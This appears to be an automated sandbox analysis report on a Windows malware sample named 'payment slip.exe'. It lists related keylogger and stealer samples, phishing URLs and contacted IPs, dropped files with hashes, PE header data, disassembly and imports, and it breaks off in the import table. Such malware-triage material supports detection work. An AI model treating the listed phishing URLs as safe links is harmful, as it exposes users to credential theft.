                                      • 149.154.167.220
                                      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Nuevo orden.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      QH098767890000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Shipping Documents 2906381504.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      qnOcrxwuiR.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      PRODUCTS LIST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      CLOUDFLARENETUSZiraat Bankas#U0131 Swift Mesaj#U0131_1.docx.docGet hashmaliciousUnknownBrowse
                                      • 104.21.76.154
                                      http://plonoer.com.ru/QUYmT/Get hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      https://tti-sftpl--c.visualforce.com/resource/1574239418000/TTILOGOGet hashmaliciousUnknownBrowse
                                      • 172.64.155.119
                                      Sign02110.exeGet hashmaliciousPureLog StealerBrowse
                                      • 188.114.97.3
                                      UW-GIUGNO24 - Ordine finale.exeGet hashmaliciousPureLog StealerBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.Win32.PWSX-gen.23596.1174.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                      • 188.114.97.3
                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      https://trbsbmiqha.cfolks.pl/unnamed.pngGet hashmaliciousUnknownBrowse
                                      • 1.1.1.1
                                      viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                      • 104.16.185.241
                                      cargo detail.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      UTMEMUSRFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      Nuevo orden.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      General Attachment.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      QH098767890000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
                                      • 132.226.214.62
                                      MT GLOBAL GLORY V1909 AGENT NOMINATION.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      Vsl Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.8.169
                                      Swift copy 00473.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      Booking_No063.vbeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      PUBLIC-DOMAIN-REGISTRYUSInvoice and parking list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.251.85.202
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 162.222.225.16
                                      https://www.naturist.guide/stats/ct.php?t=2&g=3&id=118&url=https://MSOFT_DOCUSIGN_VERIFICATION_SECURED-DOC_OFFICE.zatrdg.com/page-authentication/lp1KnkIVTV4OQaYeRtRaU7PfJ8aa3O/CnicholsGet hashmaliciousUnknownBrowse
                                      • 208.91.198.96
                                      shipping doc.exeGet hashmaliciousAgentTeslaBrowse
                                      • 162.251.85.202
                                      (No subject) (44).emlGet hashmaliciousUnknownBrowse
                                      • 208.91.198.96
                                      Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
                                      • 162.251.85.202
                                      SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.91.198.143
                                      ynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.91.199.224
                                      2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                                      • 208.91.199.224
                                      file.exeGet hashmaliciousSystemBCBrowse
                                      • 103.50.162.156

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Win32.PWSX-gen.23596.1174.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                      • 188.114.96.3
                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      cargo detail.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      Piping Bulk Material Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      UECzma0Kki.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      UECzma0Kki.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      YEN#U0130 S#U0130PAR#U0130#U015e SABO RFQ 2701203-GREECE 10224_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      Fiyat ve Termin Talebi Hk... 400 adet08.03.2024 0191621#_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      3b5074b1b5d032e5620f69f9f700ff0eSign02110.exeGet hashmaliciousPureLog StealerBrowse
                                      • 149.154.167.220
                                      UW-GIUGNO24 - Ordine finale.exeGet hashmaliciousPureLog StealerBrowse
                                      • 149.154.167.220
                                      viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                      • 149.154.167.220
                                      https://ddd.tiktok7.org/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      https://exchange.add-solution.de/owa/owa_ocbcadejsm_form?l293yq==/owa_ocbcadejsm_form?l293ys9vd2ffb2niy2fkzwpzbv9mb3jtp0wyotnzut09/owa_ocbcadejsm_form?l293ys9vd2ffb2niy2fkzwpzbv9mb3jtp0wyotnzut09l293yv9vy2jjywrlanntx2zvcm0/tdi5m1ltoxzkmkzmyjjoavkyrmtav3b6yly5bwizsnrqmhd5t1rowlvumdk=Get hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      https://dear-house-request-01.surge.sh/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      https://hwy.pages.dev/%5C%5C%5C%22https:%5C/%5C/tapestry.tapad.com%5C/tapestry%5C/1?ta_partner_id=950&ta_redirect=httpsGet hashmaliciousHTMLPhisherBrowse
                                      • 149.154.167.220
                                      https://yhz.pages.dev/%5C%5C%5C%22https:%5C/%5C/t.myvisualiq.net%5C/impression_pixel?r=739915162&et=i&ago=212&ao=546&aca=26620495&si=4449639&ci=-7&pi=316681543&ad=-7&advt=4470647&chnl=-7&vndr=115&sz=6696&u=%5Bcustom_data%5D&pt=i%5C%5C%5C%22Get hashmaliciousHTMLPhisherBrowse
                                      • 149.154.167.220
                                      http://porodix.cyberspector.network/Get hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      http://ourtime.people-meedia.workers.dev/v3/aboutonlinedatingGet hashmaliciousHTMLPhisherBrowse
                                      • 149.154.167.220

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\Melber

                                      Download File
                                      Process:C:\Users\user\Desktop\payment slip.exe
                                      File Type:ASCII text, with very long lines (28674), with no line terminators
                                      Category:modified
                                      Size (bytes):28674
                                      Entropy (8bit):3.581233785751595
                                      Encrypted:false
                                      SSDEEP:768:XBQPkzXIfqkY4G04QhBgn2RDAmj0zCOaLHD73Oy3K:wkcfqp4G04QhBc2FAk08HC
                                      MD5:45B1299C58CB3D5ECB729FB2091F05D3
                                      SHA1:E719E34FF4641D054C264927E80D225938B8CE4A
                                      SHA-256:041B6BA032AE859065A0AF59BA6D6957B2A0A2AEA26DE83E925F57AE5C8D62F1
                                      SHA-512:3E34F6C2AF98AE29A004461FFB9A9A147A29EABF981ACB91BD410D008647C70660340BED538C0769C53CA9ACF5CC023304D76045A5FDDDDD2BAF4255EDEC4E7B
                                      Malicious:false
                                      Reputation:low
                                      Preview:5}::=gjh=6jhhh575555:;:<g=;g555555;;=>9:=9g>;:555555;;=>9i=;gf<7555555;;=>::==g=;j555555;;=>9:=fg>;:555555;;=>9i=hgf;h555555;;=>::=jg=88555555;;=>9:>5g>87555555;;=>9i>7gf7j555555;;=>::>9g=;9555555;;=>9:>;g>;h555555;;=>9i>=gf;h555555;;=>::>f88h5;;=>9:>hg>;j555555;;=>=i99kkkkkkgf<9555555;;=>>:9;kkkkkkg=;9555555;;=>=:9=kkkkkkg>;h555555;;=>=i9fkkkkkkgf;h555555;;=>>:9hkkkkkkg=7j555555;;=>=:9jkkkkkkg>;9555555;;=>=i:5kkkkkkgf;h555555;;=>>::7kkkkkkg=;h555555;;=>=::9kkkkkk88h>;;=>=i:;kkkkkkgf<:555555;;=>::i5g=<8555555;;=>9:i7g>;:555555;;=>9ii9gf<7555555;;=>::i;g=88555555;;=>9:i=g>87555555;;=>9iifgf7j555555;;=>::ihg=;9555555;;=>9:ijg>;h555555;;=>9ij5gf;h555555;;=>::j788h5;;=>9:j9g>;6555555;;=>=i;=kkkkkkgf;9555555;;=>>:;fkkkkkkg=<;555555;;=>=:;hkkkkkkg>;6555555;;=>=i;jkkkkkkgf<5555555;;=>>:<5kkkkkkg=;>555555;;=>=:<7kkkkkkg>88555555;;=>=i<9kkkkkkgf87555555;;=>>:<;kkkkkkg=7j555555;;=>=:<=kkkkkkg>;9555555;;=>=i<fkkkkkkgf;h555555;;=>>:<hkkkkkkg=;h555555;;=>=:<jkkkkkk88h>;;=>9i=5gf<8555555;;=>::f5g=;=

                                      C:\Users\user\AppData\Local\Temp\aut72B7.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\payment slip.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):122244
                                      Entropy (8bit):7.867801447217767
                                      Encrypted:false
                                      SSDEEP:3072:EZVPO88g+YTqeKnMpr0lmSbUz+7omEGwIG9+ZMSwO2eD2bZIo:YPj8iUMebb7pERIG9s5wOgbb
                                      MD5:6AD6378AFAAC506AF093BCA9C975424D
                                      SHA1:5B4FFE095F0F3A9D30FCD93F2A779B75EAB04996
                                      SHA-256:03CFAC725AF532582EE0642B2A73BA3AF8D084867309BD83F5F0D17B5B48CA49
                                      SHA-512:1DD096986FD744075CD5B5207ED08B80AFF1F30EF795761D9DB59B1312B0597C03DF6706941AFBC73644A938209DB4DE9D923FFE1034D6DD8A3249C8CF5D81D8
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..2..C;..N.H..5nn..1..3.U..U......S..&U*...1....v@..~..R.....I...Qy..q.P'....Gi.......*..d3i5.?.]..X..C-..(.....#0;.F.~..f8._f.....N.I.L.5i.:.1...1O..).....r..H.i.F..0RjuZ(.Fj....S@. ..gS..js*.ZeB..k3.Ul.c.....n..t..S).j....6.S..!........@.........o.e"|.0Ui.....l.....#S../......`Q......U.....m.....R.q[|.[".L(t....2.8).....Q.\.Uk..G....5i.d.`.R..]o6.N..hT......U..^..a......3..g.O..y2....13..f.J....S.....0D...(..t..$.....O..%...X.`.........0W......L..)...B.K....jU.!S..q...!R.N.4.L.8.Uh5.E2cS....*.seQ.Lj..d.A..h5jd...`t............*.H.^*.$....fU.lb.V..n.....y..j.j..C..b......Y#.:...S..i....H..:5.J.........QC.Lj..E.!/........N...u.UZ.P.......t.W...-&5h..*........y..F...J$5.u67J..eu.."....mR...Ay.F.s...O.UmwI.h.`....9D..V...8...._i.H.....^......#....H.Mo4[..e#.I*Ri...I.S,.....'....".(..$.9........i.$...F.$.e....ve...;A.P..zm.q{..j..fcQ.RcP.\..^.N,.@......*W.}F.a....Z.Vk..H)Uz|..2._,..d..J...Z."......).n...U#6.u&u`..2...;.P...eF......\.o:..*..

                                      C:\Users\user\AppData\Local\Temp\aut7325.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\payment slip.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9768
                                      Entropy (8bit):7.655974649348344
                                      Encrypted:false
                                      SSDEEP:192:ekTYCxDR8l9LfBjZ/YiWQdLqBMhGuErhTGMjMzUfV6KrK0gWWE9:5T19WLxZ/YjQLqQPErhTGMwzGaFu
                                      MD5:7AB2E8A01A6B043C2C83C7FCF4D18130
                                      SHA1:0DA03BABD725A8B5FE04B7DBC14A002065B84AA9
                                      SHA-256:F789C0E17405B1412F362769E9616ADFE6C676C035A51D9F57B9CC7D264DAAF2
                                      SHA-512:6C434D9C4898D9BAD7A7D52D55775311DFE8D24B9D3CA54F55AF0DEC4AECB97D82055CAE5817123728035B217F5676E0223EBC2B12FE11B16BF6A9E036A0D982
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..p...gS...h..V.E.k7.......yg.......k;..g...sg.N.@.]....i...K........|.`.o..g.N.......=.N...>.......m3..7.Z..u>..6...o.v..Z......g.>.N'....Z....N.m3.........>.Ng`...r.'.....c ....Af.H.....@.F.3<..Z..6...L.j........x..t....B|.....Y..0.N.3[<.x...Zf.5_..r....g`5_..z.U..l.5_....U..m@5_..j.U...5\..>3`..N.^.f.Z..u;.z..y;......@........G../Z.........j|....x.u....$.../.y=...g.G_T......-@>_.......zu:..........p...................`.M..`... ...h...@..P.'.9...{>K<..c.....Y.`._..z......>K8#G.g..3|v...G.9..&.8_..uh..i|v.....h.h.-.`......E..<..s.]....'v.;..=..S..L..6...f..+@.ff.y...;..m ...f..E...Y....3...............v............2p....<d....,vl...4.....!+@.'&.....,fy7.Zm6y......r.7.X...c3.L.ok.Y.!...Gf.....,f.>.Om`. .#<.....c..........z.h.s.....,vp...<..t.....40......g ....f.....4..@.6.-..p..S.U..7...S..N..;:.`..>..m....u=.....c....Z...wx.....vv.........E.....@y6....p.c3.M..9..b.!....F ....B5h..'.........vx......f..M.|...B3....@.;=.X...f.....H........g....M.S.T..h...

                                      C:\Users\user\AppData\Local\Temp\ferritic

                                      Download File
                                      Process:C:\Users\user\Desktop\payment slip.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):274944
                                      Entropy (8bit):6.918703260044045
                                      Encrypted:false
                                      SSDEEP:6144:Y0htQiMAHXVKTWhC/i/WKE9x32aSXSraTO14AW6ALKY:Y82HAHXVKTWhC/i/W/9x32aSXSGTO14X
                                      MD5:C97745933A300B3D0963609FD5071ED6
                                      SHA1:E1D6F40D7D35446926307B79B2E051411F6E2261
                                      SHA-256:ECB5473781121B81F4F986AF1F42BFD03C5C6F8E162ED7B126A42CF818F34ABC
                                      SHA-512:285B7CE91817F74C32A569F00CB1057E03FE4479A44E4D5429F650CC45E71139ACC123E9E487F8906F7950779BA7D2A82027117EEDAD2122027A115992FD4274
                                      Malicious:false
                                      Reputation:low
                                      Preview:...N2SCHW2QV.V1.NI0JKSU.VHN1SCHS2QV2RV1QNI0JKSUAVHN1SCHS2QV.RV1_Q.>J.Z.`.I..r. :Aq&@=1C0#iS+%=:5v*+.!6&s[?vv...<!-UdF^_eVHN1SCH.wQV~SU1...VJKSUAVHN.SAIX3.V2NR1QZI0JKSUOmLN1sCHSrUV2R.1QnI0JISUEVHN1SCHW2QV2RV1Q.M0JISUAVHN3S..S2AV2BV1QNY0J[SUAVHN!SCHS2QV2RV1.tM0.KSUA.LN&CCHS2QV2RV1QNI0JKSUA6LN=SCHS2QV2RV1QNI0JKSUAVHN1SCHS2QV2RV1QNI0JKSUAVHN1SCHS.QV:RV1QNI0JKSUIvHNySCHS2QV2RV1.:,H>KSUUMLN1sCHS.UV2PV1QNI0JKSUAVHN.SC(}@"$QRV1F^I0J.WUADHN1MGHS2QV2RV1QNI0.KS.o$-"^0CH_2QV22R1QLI0J{WUAVHN1SCHS2QVrRVsQNI0JKSUAVHN1SCH..UV2RV1.NI0HKVU..JN..BHP2QV.RV7e.K0.KSUAVHN1SCHS2QV2RV1QNI0JKSUAVHN1SCHS2QV2RV1.3.?...<2..N1SCHS3SU6T^9QNI0JKSU?VHNwSCH.2QV.RV1tNI0'KSUeVHNOSCH-2QVVRV1#NI0+KSU.VHN^SCH=2QVLRV1OLa.JKY.gVJf.SCBS..%.RV;.OI0N8pUA\.L1SG;w2Q\.QV1U=l0JA.QAVL=.SCB.7QV6x.1R._6JKH:xVHD1P.]U2QM.tV3ytI0@KysAU.[7SCSy.QT.[V1Ud.CWKSSi.HN;'JHS0.\2RR.OLatJKY.c(CN1WhHy./Z2RR.QdkNGKSQjVbP3.NHS6{tL\V1UeI.h5\UARcN.MA.\2QR.p(!QNM.Jaq+PVHJ.Sij- QV6yV.s0Z0JOxUkt6Z1SGcS.s('RV5zNc.4]SUE}Hd.-THS6zV.p()QNM.JaMW.NHN5yEb12#p$R&2

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.885746394009194
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:payment slip.exe
                                      File size:1'065'472 bytes
                                      MD5:0cac6a293391fdb0f89189a89dc47150
                                      SHA1:080ab6bad708ce618e411d2f1aab56cd24b058ba
                                      SHA256:51b79481d9e411146f4d43f1c3028b71c020ebd3ebb2e0eaeddc03a7ca0c1106
                                      SHA512:e38ad11754d30d19b1164df37815c309be726a4a5cc162d2082fdcb32e47ef8bdb4e8bf71a742a73c8b20c7f8399657b5d68ee71f8cf77f92c1fb0932f7bae5e
                                      SSDEEP:24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8aGw7eg:7TvC/MTQYxsWR7aGw7
                                      TLSH:CE35BF0273D1C062FF9B92334B5AF6115BBC69260123E61F13981DBABE705B1563E7A3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                      File Icon

                                      Icon Hash:aaf3e3e3938382a0

                                      Static PE Info

                                      General

                                      Entrypoint:0x420577
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66A97D6E [Tue Jul 30 23:55:26 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:948cc502fe9226992dce9417f952fce3

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F6D847B9063h
                                      jmp 00007F6D847B896Fh
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F6D847B8B4Dh
                                      mov dword ptr [esi], 0049FDF0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FDF8h
                                      mov dword ptr [ecx], 0049FDF0h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F6D847B8B1Ah
                                      mov dword ptr [esi], 0049FE0Ch
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FE14h
                                      mov dword ptr [ecx], 0049FE0Ch
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      and dword ptr [eax], 00000000h
                                      and dword ptr [eax+04h], 00000000h
                                      push eax
                                      mov eax, dword ptr [ebp+08h]
                                      add eax, 04h
                                      push eax
                                      call 00007F6D847BB70Dh
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      lea eax, dword ptr [ecx+04h]
                                      mov dword ptr [ecx], 0049FDD0h
                                      push eax
                                      call 00007F6D847BB758h
                                      pop ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      push eax
                                      call 00007F6D847BB741h
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x2d6d4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1020000x7594.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xd40000x2d6d40x2d8004470ababa5eff70068a07ac37aa9ab85False0.8550287603021978data7.706643227579641IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1020000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                      RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                      RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                      RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                      RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                      RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                      RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                      RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                      RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                      RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                      RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                      RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                      RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                      RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                      RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                      RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                      RT_RCDATA0xdc7b80x2499cdata1.000373542517143
                                      RT_GROUP_ICON0x1011540x76dataEnglishGreat Britain0.6610169491525424
                                      RT_GROUP_ICON0x1011cc0x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0x1011e00x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0x1011f40x14dataEnglishGreat Britain1.25
                                      RT_VERSION0x1012080xdcdataEnglishGreat Britain0.6181818181818182
                                      RT_MANIFEST0x1012e40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                      Imports

                                      DLLImport
                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                      PSAPI.DLLGetProcessMemoryInfo
                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                      UxTheme.dllIsThemeActive
                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, 